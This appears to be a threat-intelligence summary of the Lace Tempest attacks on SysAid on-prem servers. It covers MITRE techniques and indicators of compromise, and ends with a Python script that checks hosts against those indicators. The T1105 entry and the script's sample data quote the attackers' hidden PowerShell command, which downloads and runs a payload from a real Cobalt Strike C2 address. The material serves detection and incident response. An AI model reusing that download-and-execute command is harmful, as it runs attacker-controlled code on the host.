SysAid’s on-premises software was found to have a zero-day path traversal vulnerability that allowed code execution, exploited by DEV-0950 (Lace Tempest). The attackers deployed a WebShell via a WAR file, loaded the GraceWire loader to inject into system processes, and then used Cobalt Strike for command and control; defenders are urged to patch to 23.3.36 and perform compromise assessments. #SysAid #LaceTempest #GraceWire #CobaltStrike #SysAidOnPrem
Key points
- The issue is a previously unknown path traversal vulnerability in SysAid on-prem software that leads to code execution.
- The WebShell was uploaded into the SysAid Tomcat web service webroot, enabling attacker control over the affected host.
- The GraceWire loader was deployed and used to inject into processes such as spoolsv.exe, msiexec.exe, and svchost.exe.
- A second PowerShell script was used to erase evidence from disks and web logs, hindering incident response.
- The attackers downloaded and executed a Cobalt Strike agent via PowerShell to establish remote control.
- The vulnerability and activities were observed by Microsoft Threat Intelligence as linked to DEV-0950 (Lace Tempest); patches are available (23.3.36).
- Microsoft Defender detections include Trojan:Win32/TurtleLoader, Backdoor:Win32/Clop, and Ransom:Win32/Clop.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The investigation identified a previously unknown path traversal vulnerability leading to code execution within the SysAid on-prem software. Quote: “…path traversal vulnerability leading to code execution within the SysAid on-prem software.”
- [T1505.003] Web Shell – The attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. Quote: “The attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service.”
- [T1055] Process Injection – GraceWire loader injected into spoolsv.exe, msiexec.exe, svchost.exe. Quote: “the GraceWire trojan, injecting it into one of the following processes: spoolsv.exe, msiexec.exe, svchost.exe.”
- [T1070.001] Clear Windows Event Logs – The attacker erased evidence from disk and SysAid server web logs. Quote: “to erase evidence associated with the attacker’s actions from the disk and the SysAid on-prem server web logs.”
- [T1059.001] PowerShell – The attack used two PowerShell scripts, including ones to launch the loader and remove evidence. Quote: “PowerShell Used to Launch Malware Loader” and “PowerShell Used to Erase Evidence from Victim Servers.”
- [T1105] Ingress Tool Transfer – The Cobalt Strike beacon was downloaded and executed via PowerShell. Quoted “Cobalt Strike” command: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’))”
Indicators of Compromise
- [Hash] b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d – Malicious loader for user.exe
- [IP] 81.19.138.52 – GraceWire Loader C2
- [IP] 45.182.189.100 – GraceWire Loader C2
- [IP] 179.60.150.34 – Cobalt Strike C2
- [Path] C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe – GraceWire loader
- [Path] C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war – Archive of WebShells and tools used by the attacker
- [Path] C:\Program Files\SysAidServer\tomcat\webapps\leave – Used as a flag for the attacker scripts during execution
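A compromise-assessment check built from the indicators above, as an added example (not code from SysAid or Microsoft): it matches process command lines against the shape of the quoted PowerShell download cradle and the listed C2 addresses, and matches file paths and SHA-256 digests against the listed paths and hash. The sample command lines and file paths are constructed for the demonstration; on a real host, feed it process-creation events and a listing of the Tomcat webapps directory.

```python
import re

# Indicators exactly as listed in the summary above.
IOC_PATHS = {
    r"C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe",
    r"C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war",
    r"C:\Program Files\SysAidServer\tomcat\webapps\leave",
}
IOC_SHA256 = {"b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d"}
IOC_IPS = {"81.19.138.52", "45.182.189.100", "179.60.150.34"}

# Shape of the quoted launch: hidden, no-profile PowerShell that IEX's a WebClient.DownloadString result.
CRADLE = re.compile(r"-w(?:indowstyle)?\s+hidden.*\bIEX\b.*net\.webclient.*downloadstring", re.I | re.S)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def check_command_line(cmdline):
    """Reasons a process command line (e.g. Sysmon event 1 / Windows 4688) matches the advisory."""
    reasons = []
    if CRADLE.search(cmdline):
        reasons.append("powershell download cradle")
    hits = IOC_IPS & set(IP_RE.findall(cmdline))
    if hits:
        reasons.append("known C2 " + ",".join(sorted(hits)))
    return reasons

def check_file(path, sha256=None):
    """Reasons a file matches: listed path (slash/case-insensitive) or listed SHA-256 (hex digest)."""
    reasons = []
    norm = path.replace("/", "\\").lower()
    if norm in {p.lower() for p in IOC_PATHS}:
        reasons.append("ioc path")
    if sha256 and sha256.lower() in IOC_SHA256:
        reasons.append("ioc sha256")
    return reasons

# Constructed sample input (not taken from a real host).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "
    r"IEX ((new-object net.webclient).downloadstring('http://179.60.150.34:80/a'))",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\ops\backup.ps1",
]
SAMPLE_FILES = [r"C:\Program Files\SysAidServer\tomcat\webapps\leave", r"C:\Program Files\SysAidServer\tomcat\webapps\ROOT\index.jsp"]

def assess(cmdlines=SAMPLE_CMDLINES, files=SAMPLE_FILES):
    """Return {item: reasons} for every command line or file that matched at least one indicator."""
    findings = {c: check_command_line(c) for c in cmdlines}
    findings.update({f: check_file(f) for f in files})
    return {k: v for k, v in findings.items() if v}

print(assess())  # run stand-alone to see which sample items matched and why
```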
Read more: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification